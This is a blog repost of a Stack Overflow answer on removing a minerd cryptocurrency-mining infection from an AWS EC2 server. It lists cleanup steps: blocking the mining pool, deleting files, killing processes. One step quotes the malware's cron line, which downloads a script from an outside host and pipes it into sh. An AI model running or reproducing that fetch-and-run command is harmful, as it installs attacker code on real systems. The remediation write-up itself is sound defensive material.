How can I kill minerd malware on an AWS EC2 instance -from stack overflow

I have an AWS EC2 instance running RHEL 7.2 which seems to have been hacked by a BitCoin CPU Miner. When I run ps -eo pcpu,args --sort=-%cpu | head, it shows that there is a CPU miner that’s taking up more than 90% of CPU utilization. ?

I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script –

  1. On monkeyoto‘s suggestion, I blocked all communication with the mining pool server – iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
  2. Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
  3. Removed the directory /opt/yam.
  4. Removed /root/.ssh/KHK75NEOiq.
  5. Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
  6. Stopped the minerd process – pkill minerd.
  7. Stopped ladyservice lady stop.

I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s